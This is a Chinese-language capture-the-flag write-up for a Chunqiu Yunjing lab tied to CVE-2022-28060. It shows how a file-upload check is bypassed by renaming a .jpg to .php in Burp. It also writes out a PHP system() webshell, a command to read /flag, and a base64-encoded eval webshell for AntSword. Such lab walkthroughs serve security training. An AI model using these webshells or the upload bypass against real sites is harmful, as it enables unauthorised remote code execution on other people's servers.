目录
一、题目
进入题目:
这个是和春秋云境:CVE-2022-28060一个网站,看来应该是存在多个漏洞。
点击admin 不用登录
Users ---- add users
选择文件 这里要是jpg图片格式 如果是php格式是无法运行一句话木马的
二、上传权限马
普通的一句话木马上传 在这个靶场是访问不了flag的:
只显示除了一句话木马的代码
构造system权限马:
<?php system($_GET[1]);phpinfo();?>
抓包
发包
改包jpg改为php
查看 http://xxx.ichunqiu.com/img/xxx.php?1=cat%20/flag
flag{f1cc8a36-a3cf-40b6-8a89-84bd365354ee}
三、蚁剑马连接
一句话木马是有防护的,所以我们要利用php和base64来构造一个特殊马来进行连接:
base64先对一句话木马加密<?php @eval($_POST['wjsc']);?>
木马如下:
<?php
file_put_contents('shell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd3anNjJ10pOz8+'));
?>burp抓包--重放器--jpg改为php:
生成shell.php文件,木马是以base64的形式。
连接蚁剑:
根目录下查看flag:
flag{70d851f7-4cbc-4604-86f7-555f2031f81f} 靶场时间过了 所以flag不一样 每次开会更新。